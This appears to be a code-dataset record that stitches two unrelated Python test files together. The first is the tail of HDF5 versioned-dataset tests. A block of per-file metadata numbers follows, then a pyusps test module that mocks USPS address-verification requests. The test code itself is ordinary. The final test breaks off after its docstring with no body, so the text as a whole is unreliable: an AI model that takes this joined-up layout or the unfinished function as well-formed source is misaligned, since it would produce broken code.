    data2 = data.copy()
    for n, (i, j, k) in enumerate(corners):
        data2[i * C:(i + 1) * C, j * C:(j + 1) * C, k * C:(k + 1) * C] = n
    slices2 = write_dataset(h5file, 'test_data', data2, chunks=chunks)
    virtual_data2 = create_virtual_dataset(h5file, 'test_version2',
                                           'test_data', slices2)
    assert virtual_data2.shape == shape
    for n, (i, j, k) in enumerate(corners):
        assert_equal(virtual_data2[i * C:(i + 1) * C,
                                   j * C:(j + 1) * C,
                                   k * C:(k + 1) * C], n)
    assert virtual_data2.dtype == np.float64
@mark.setup_args(version_name='test_version')
def test_create_virtual_dataset_offset(h5file):
    """Virtual dataset whose last chunk is a 2-element-short partial chunk."""
    D = DEFAULT_CHUNK_SIZE
    slices1 = write_dataset(h5file, 'test_data', np.ones((2 * D,)))
    slices2 = write_dataset(
        h5file, 'test_data',
        np.concatenate((2 * np.ones((D,)), 3 * np.ones((D - 2,)))))
    # The short chunk of threes becomes the truncated final virtual chunk.
    chunk_map = dict(slices1)
    chunk_map[Tuple(Slice(2 * D, 3 * D - 2, 1))] = \
        slices2[(Slice(D, 2 * D - 2, 1),)]
    virtual_data = create_virtual_dataset(h5file, 'test_version', 'test_data',
                                          chunk_map)
    assert virtual_data.shape == (3 * D - 2,)
    assert_equal(virtual_data[0:2 * D], 1.0)
    assert_equal(virtual_data[2 * D:3 * D - 2], 3.0)
@mark.setup_args(version_name='test_version')
def test_create_virtual_dataset_offset_multidimension(h5file):
    """3-D virtual dataset over data truncated by 2 along every axis."""
    C = CHUNK_SIZE_3D
    chunks = 3 * (C,)
    shape = (2 * C, 2 * C, 2 * C)
    write_dataset(h5file, 'test_data', np.zeros(shape), chunks=chunks)

    shape2 = (2 * C - 2, 2 * C - 2, 2 * C - 2)
    data2 = np.empty(shape2)
    # Label each (full-grid) chunk region with its chunk number.
    for n, c in enumerate(split_chunks(shape, chunks)):
        data2[c.raw] = n
    slices2 = write_dataset(h5file, 'test_data', data2, chunks=chunks)
    virtual_data = create_virtual_dataset(h5file, 'test_version', 'test_data',
                                          slices2)
    assert virtual_data.shape == shape2
    assert_equal(virtual_data[()], data2)
    assert virtual_data.dtype == np.float64
def test_write_dataset_chunk_size(h5file):
    """A non-default chunk size sticks; a mismatched later size is rejected."""
    chunk_size = 2 ** 10
    chunks = (chunk_size,)

    def key(i):
        return Tuple(Slice(i * chunk_size, (i + 1) * chunk_size, 1))

    slices1 = write_dataset(h5file, 'test_data', np.ones((2 * chunk_size,)),
                            chunks=chunks)
    # Writing the same dataset again with a different chunk size must fail.
    raises(ValueError, lambda: write_dataset(
        h5file, 'test_data', np.ones(chunks), chunks=(2 ** 9,)))
    slices2 = write_dataset_chunks(h5file, 'test_data', {
        key(0): slices1[key(0)],
        key(1): 2 * np.ones((chunk_size,)),
        key(2): 2 * np.ones((chunk_size,)),
        key(3): 3 * np.ones((chunk_size,)),
    })

    assert slices1 == {key(0): slice(0, chunk_size),
                       key(1): slice(0, chunk_size)}
    assert slices2 == {key(0): slice(0, chunk_size),
                       key(1): slice(chunk_size, 2 * chunk_size),
                       key(2): slice(chunk_size, 2 * chunk_size),
                       key(3): slice(2 * chunk_size, 3 * chunk_size)}

    ds = h5file['/_version_data/test_data/raw_data']
    assert ds.shape == (3 * chunk_size,)
    assert_equal(ds[0:chunk_size], 1.0)
    assert_equal(ds[chunk_size:2 * chunk_size], 2.0)
    assert_equal(ds[2 * chunk_size:3 * chunk_size], 3.0)
    assert_equal(ds[3 * chunk_size:4 * chunk_size], 0.0)
    assert ds.dtype == np.float64
def test_write_dataset_offset_chunk_size(h5file):
    """Partial trailing chunk combined with a non-default chunk size."""
    chunk_size = 2 ** 10
    chunks = (chunk_size,)

    def key(start, stop):
        return Tuple(Slice(start, stop, 1))

    slices1 = write_dataset(h5file, 'test_data',
                            1 * np.ones((2 * chunk_size,)), chunks=chunks)
    slices2 = write_dataset(
        h5file, 'test_data',
        np.concatenate((2 * np.ones(chunks),
                        2 * np.ones(chunks),
                        3 * np.ones((chunk_size - 2,)))))

    assert slices1 == {key(0, chunk_size): slice(0, chunk_size),
                       key(chunk_size, 2 * chunk_size): slice(0, chunk_size)}
    assert slices2 == {
        key(0, chunk_size): slice(chunk_size, 2 * chunk_size),
        key(chunk_size, 2 * chunk_size): slice(chunk_size, 2 * chunk_size),
        # The final chunk is 2 elements short.
        key(2 * chunk_size, 3 * chunk_size - 2):
            slice(2 * chunk_size, 3 * chunk_size - 2),
    }

    ds = h5file['/_version_data/test_data/raw_data']
    assert ds.shape == (3 * chunk_size,)
    assert_equal(ds[0:chunk_size], 1.0)
    assert_equal(ds[chunk_size:2 * chunk_size], 2.0)
    assert_equal(ds[2 * chunk_size:3 * chunk_size - 2], 3.0)
    assert_equal(ds[3 * chunk_size - 2:4 * chunk_size], 0.0)
def test_write_dataset_compression(h5file):
    """Compression options are fixed at first write; mismatches raise."""
    D = DEFAULT_CHUNK_SIZE
    slices1 = write_dataset(h5file, 'test_data', np.ones((2 * D,)),
                            compression='gzip', compression_opts=3)
    # Neither a different codec nor a different gzip level is allowed later.
    raises(ValueError, lambda: write_dataset(
        h5file, 'test_data', np.ones((D,)), compression='lzf'))
    raises(ValueError, lambda: write_dataset(
        h5file, 'test_data', np.ones((D,)),
        compression='gzip', compression_opts=4))

    # Both all-ones chunks dedupe onto the single stored chunk.
    assert slices1 == {(Slice(0, D, 1),): slice(0, D),
                       (Slice(D, 2 * D, 1),): slice(0, D)}
    ds = h5file['/_version_data/test_data/raw_data']
    assert ds.shape == (D,)
    assert_equal(ds[0:D], 1.0)
    assert ds.dtype == np.float64
    assert ds.compression == 'gzip'
    assert ds.compression_opts == 3
| 45.576923
| 102
| 0.647637
| 3,726
| 23,700
| 3.769726
| 0.025228
| 0.356899
| 0.254521
| 0.129005
| 0.937847
| 0.923252
| 0.912146
| 0.897053
| 0.879681
| 0.844297
| 0
| 0.068748
| 0.217468
| 23,700
| 519
| 103
| 45.66474
| 0.688612
| 0.001097
| 0
| 0.686099
| 0
| 0
| 0.034809
| 0.01525
| 0
| 0
| 0
| 0
| 0.174888
| 1
| 0.035874
| false
| 0.002242
| 0.017937
| 0
| 0.053812
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fe2b8880b31c0d29320b2db7b2950665ba48fa7c
| 21,858
|
py
|
Python
|
pyusps/test/test_address_information.py
|
frnsys/pyusps
|
a96a45ada5ae2af566983c047944f6219c7134e5
|
[
"MIT"
] | 14
|
2015-02-02T21:02:40.000Z
|
2021-11-03T14:13:19.000Z
|
pyusps/test/test_address_information.py
|
frnsys/pyusps
|
a96a45ada5ae2af566983c047944f6219c7134e5
|
[
"MIT"
] | 6
|
2017-12-21T19:07:38.000Z
|
2022-03-13T01:49:12.000Z
|
pyusps/test/test_address_information.py
|
frnsys/pyusps
|
a96a45ada5ae2af566983c047944f6219c7134e5
|
[
"MIT"
] | 21
|
2015-08-28T23:25:33.000Z
|
2021-04-19T22:11:37.000Z
|
import fudge
from collections import OrderedDict
from nose.tools import eq_ as eq
from io import StringIO
from pyusps.address_information import verify
from pyusps.test.util import assert_raises, assert_errors_equal
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_simple(fake_urlopen):
    """verify() with a full street/city/state/zip address should issue one
    request with the expected URL and return the normalized fields."""
    fake_urlopen = fake_urlopen.expects_call()
    # The exact request URL verify() is expected to build (URL-encoded XML).
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%3E20770%3C%2FZip5%3E%3CZip4%3E%3C%2FZip4%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    fake_urlopen = fake_urlopen.with_args(req)
    # Canned USPS XML response the fake urlopen returns.
    res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
    fake_urlopen.returns(res)
    address = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
        ('zip_code', '20770'),
    ])
    res = verify(
        'foo_id',
        address,
    )
    expected = OrderedDict([
        ('address', '6406 IVY LN'),
        ('city', 'GREENBELT'),
        ('state', 'MD'),
        ('zip5', '20770'),
        ('zip4', '1441'),
    ])
    eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_zip5(fake_urlopen):
    """verify() with a 5-digit zip only (no zip4 part).

    NOTE(review): this test is byte-identical to test_verify_simple --
    presumably it was meant to exercise a distinct zip5-only input; confirm
    intent before consolidating.
    """
    fake_urlopen = fake_urlopen.expects_call()
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%3E20770%3C%2FZip5%3E%3CZip4%3E%3C%2FZip4%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    fake_urlopen = fake_urlopen.with_args(req)
    res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
    fake_urlopen.returns(res)
    address = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
        ('zip_code', '20770'),
    ])
    res = verify(
        'foo_id',
        address,
    )
    expected = OrderedDict([
        ('address', '6406 IVY LN'),
        ('city', 'GREENBELT'),
        ('state', 'MD'),
        ('zip5', '20770'),
        ('zip4', '1441'),
    ])
    eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_zip_both(fake_urlopen):
    """verify() with a combined 9-digit zip ('207701441') should split it
    into Zip5 and Zip4 in the request."""
    fake_urlopen = fake_urlopen.expects_call()
    # Note the request carries Zip4=1441, unlike the zip5-only tests.
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%3E20770%3C%2FZip5%3E%3CZip4%3E1441%3C%2FZip4%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    fake_urlopen = fake_urlopen.with_args(req)
    res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
    fake_urlopen.returns(res)
    address = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
        ('zip_code', '207701441'),
    ])
    res = verify(
        'foo_id',
        address,
    )
    expected = OrderedDict([
        ('address', '6406 IVY LN'),
        ('city', 'GREENBELT'),
        ('state', 'MD'),
        ('zip5', '20770'),
        ('zip4', '1441'),
    ])
    eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_zip_dash(fake_urlopen):
    """verify() with a dashed zip ('20770-1441') should split it into Zip5
    and Zip4 in the request, same as the undashed 9-digit form."""
    fake_urlopen = fake_urlopen.expects_call()
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%3E20770%3C%2FZip5%3E%3CZip4%3E1441%3C%2FZip4%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    fake_urlopen = fake_urlopen.with_args(req)
    res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
    fake_urlopen.returns(res)
    address = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
        ('zip_code', '20770-1441'),
    ])
    res = verify(
        'foo_id',
        address
    )
    expected = OrderedDict([
        ('address', '6406 IVY LN'),
        ('city', 'GREENBELT'),
        ('state', 'MD'),
        ('zip5', '20770'),
        ('zip4', '1441'),
    ])
    eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_zip_only(fake_urlopen):
    """verify() with no state: the request should carry an empty <State/>
    element while still sending the zip."""
    fake_urlopen = fake_urlopen.expects_call()
    # Note the self-closing State element (%3CState%2F%3E) in the request.
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%2F%3E%3CZip5%3E20770%3C%2FZip5%3E%3CZip4%3E%3C%2FZip4%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    fake_urlopen = fake_urlopen.with_args(req)
    res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
    fake_urlopen.returns(res)
    address = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('zip_code', '20770'),
    ])
    res = verify(
        'foo_id',
        address,
    )
    expected = OrderedDict([
        ('address', '6406 IVY LN'),
        ('city', 'GREENBELT'),
        ('state', 'MD'),
        ('zip5', '20770'),
        ('zip4', '1441'),
    ])
    eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_state_only(fake_urlopen):
    """verify() with no zip: the request should carry empty <Zip5/> and
    <Zip4/> elements while still sending the state."""
    fake_urlopen = fake_urlopen.expects_call()
    # Note the self-closing Zip5/Zip4 elements in the request.
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    fake_urlopen = fake_urlopen.with_args(req)
    res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
    fake_urlopen.returns(res)
    address = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
    ])
    res = verify(
        'foo_id',
        address,
    )
    expected = OrderedDict([
        ('address', '6406 IVY LN'),
        ('city', 'GREENBELT'),
        ('state', 'MD'),
        ('zip5', '20770'),
        ('zip4', '1441'),
    ])
    eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_firm_name(fake_urlopen):
    """verify() with a firm_name: the request gains a <FirmName> element and
    the normalized firm name comes back first in the result."""
    fake_urlopen = fake_urlopen.expects_call()
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CFirmName%3EXYZ+Corp%3C%2FFirmName%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    fake_urlopen = fake_urlopen.with_args(req)
    res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><FirmName>XYZ CORP</FirmName><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
    fake_urlopen.returns(res)
    address = OrderedDict([
        ('firm_name', 'XYZ Corp'),
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
    ])
    res = verify(
        'foo_id',
        address,
    )
    expected = OrderedDict([
        ('firm_name', 'XYZ CORP'),
        ('address', '6406 IVY LN'),
        ('city', 'GREENBELT'),
        ('state', 'MD'),
        ('zip5', '20770'),
        ('zip4', '1441'),
    ])
    eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_address_extended(fake_urlopen):
    """verify() with address_extended: it maps to <Address1> in the request
    and the normalized value ('STE 12') leads the result."""
    fake_urlopen = fake_urlopen.expects_call()
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%3ESuite+12%3C%2FAddress1%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    fake_urlopen = fake_urlopen.with_args(req)
    res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address1>STE 12</Address1><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
    fake_urlopen.returns(res)
    address = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('address_extended', 'Suite 12'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
    ])
    res = verify(
        'foo_id',
        address,
    )
    expected = OrderedDict([
        ('address_extended', 'STE 12'),
        ('address', '6406 IVY LN'),
        ('city', 'GREENBELT'),
        ('state', 'MD'),
        ('zip5', '20770'),
        ('zip4', '1441'),
    ])
    eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_urbanization(fake_urlopen):
    """verify() with an urbanization field (Puerto Rico addresses): it maps
    to <Urbanization> in the request and is echoed back normalized."""
    fake_urlopen = fake_urlopen.expects_call()
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CUrbanization%3EPuerto+Rico%3C%2FUrbanization%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    fake_urlopen = fake_urlopen.with_args(req)
    res = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Urbanization>PUERTO RICO</Urbanization><Zip5>20770</Zip5><Zip4>1441</Zip4></Address></AddressValidateResponse>""")
    fake_urlopen.returns(res)
    address = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('urbanization', 'Puerto Rico'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
    ])
    res = verify(
        'foo_id',
        address,
    )
    expected = OrderedDict([
        ('address', '6406 IVY LN'),
        ('city', 'GREENBELT'),
        ('state', 'MD'),
        ('urbanization', 'PUERTO RICO'),
        ('zip5', '20770'),
        ('zip4', '1441'),
    ])
    eq(res, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_multiple(fake_urlopen):
    """Two addresses in one request come back as a list, in request order."""
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3CAddress+ID%3D%221%22%3E%3CAddress1%2F%3E%3CAddress2%3E8+Wildwood+Drive%3C%2FAddress2%3E%3CCity%3EOld+Lyme%3C%2FCity%3E%3CState%3ECT%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    xml_response = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address><Address ID="1"><Address2>8 WILDWOOD DR</Address2><City>OLD LYME</City><State>CT</State><Zip5>06371</Zip5><Zip4>1844</Zip4></Address></AddressValidateResponse>""")
    # Expect exactly one call with the exact request URL; feed back canned XML.
    fake_urlopen.expects_call().with_args(req).returns(xml_response)
    first = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
    ])
    second = OrderedDict([
        ('address', '8 Wildwood Drive'),
        ('city', 'Old Lyme'),
        ('state', 'CT'),
    ])
    result = verify('foo_id', *[first, second])
    expected = [
        OrderedDict([
            ('address', '6406 IVY LN'),
            ('city', 'GREENBELT'),
            ('state', 'MD'),
            ('zip5', '20770'),
            ('zip4', '1441'),
        ]),
        OrderedDict([
            ('address', '8 WILDWOOD DR'),
            ('city', 'OLD LYME'),
            ('state', 'CT'),
            ('zip5', '06371'),
            ('zip4', '1844'),
        ]),
    ]
    eq(result, expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_more_than_5(fake_urlopen):
    """verify() rejects a batch of more than five addresses before any I/O.

    Note: no expectation is set on fake_urlopen -- the ValueError must be
    raised before a request is ever made.
    """
    # Six empty address dicts: one past the documented per-request limit.
    addresses = [OrderedDict() for _ in range(6)]
    msg = assert_raises(ValueError, verify, 'foo_id', *addresses)
    eq(str(msg), 'Only 5 addresses are allowed per request')
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_api_root_error(fake_urlopen):
    """A top-level <Error> document (e.g. auth failure) raises ValueError."""
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    error_xml = StringIO(u"""<Error>
<Number>80040b1a</Number>
<Description>Authorization failure. Perhaps username and/or password is incorrect.</Description>
<Source>UspsCom::DoAuth</Source>
</Error>""")
    # Expect exactly one call with the exact request URL; feed back the error.
    fake_urlopen.expects_call().with_args(req).returns(error_xml)
    address = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
    ])
    msg = assert_raises(ValueError, verify, 'foo_id', address)
    expected = ('80040b1a: Authorization failure. '
                'Perhaps username and/or password is incorrect.')
    eq(str(msg), expected)
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_api_address_error_single(fake_urlopen):
    """A per-address <Error> on the only address raises ValueError directly."""
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3ENJ%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    xml_response = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Error><Number>-2147219401</Number><Source>API_AddressCleancAddressClean.CleanAddress2;SOLServer.CallAddressDll</Source><Description>Address Not Found.</Description><HelpFile></HelpFile><HelpContext>1000440</HelpContext></Error></Address></AddressValidateResponse>""")
    # Expect exactly one call with the exact request URL; feed back canned XML.
    fake_urlopen.expects_call().with_args(req).returns(xml_response)
    address = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'NJ'),
    ])
    msg = assert_raises(ValueError, verify, 'foo_id', address)
    eq(str(msg), '-2147219401: Address Not Found.')
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_api_address_error_multiple(fake_urlopen):
    """In a batch, a per-address <Error> becomes a ValueError in that slot
    while the valid address still comes back cleaned.
    """
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3CAddress+ID%3D%221%22%3E%3CAddress1%2F%3E%3CAddress2%3E8+Wildwood+Drive%3C%2FAddress2%3E%3CCity%3EOld+Lyme%3C%2FCity%3E%3CState%3ENJ%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    xml_response = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address><Address ID="1"><Error><Number>-2147219400</Number><Source>API_AddressCleancAddressClean.CleanAddress2;SOLServer.CallAddressDll</Source><Description>Invalid City.</Description><HelpFile></HelpFile><HelpContext>1000440</HelpContext></Error></Address></AddressValidateResponse>""")
    # Expect exactly one call with the exact request URL; feed back canned XML.
    fake_urlopen.expects_call().with_args(req).returns(xml_response)
    good = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
    ])
    bad = OrderedDict([
        ('address', '8 Wildwood Drive'),
        ('city', 'Old Lyme'),
        ('state', 'NJ'),
    ])
    results = verify('foo_id', *[good, bad])
    # eq does not work with exceptions. Process each item manually.
    eq(len(results), 2)
    eq(
        results[0],
        OrderedDict([
            ('address', '6406 IVY LN'),
            ('city', 'GREENBELT'),
            ('state', 'MD'),
            ('zip5', '20770'),
            ('zip4', '1441'),
        ]),
    )
    assert_errors_equal(results[1], ValueError('-2147219400: Invalid City.'))
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_api_empty_error(fake_urlopen):
    """A response with neither address nor error data raises TypeError."""
    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3ENJ%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    xml_response = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse></AddressValidateResponse>""")
    # Expect exactly one call with the exact request URL; feed back empty XML.
    fake_urlopen.expects_call().with_args(req).returns(xml_response)
    address = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'NJ'),
    ])
    msg = assert_raises(TypeError, verify, 'foo_id', address)
    eq(str(msg), 'Could not find any address or error information')
@fudge.patch('pyusps.urlutil.urlopen')
def test_verify_api_order_error(fake_urlopen):
    """Response IDs that don't match the request order raise IndexError.

    The canned response answers with IDs "0" and "2" for a two-address
    request (IDs "0" and "1"), which verify must reject.
    """
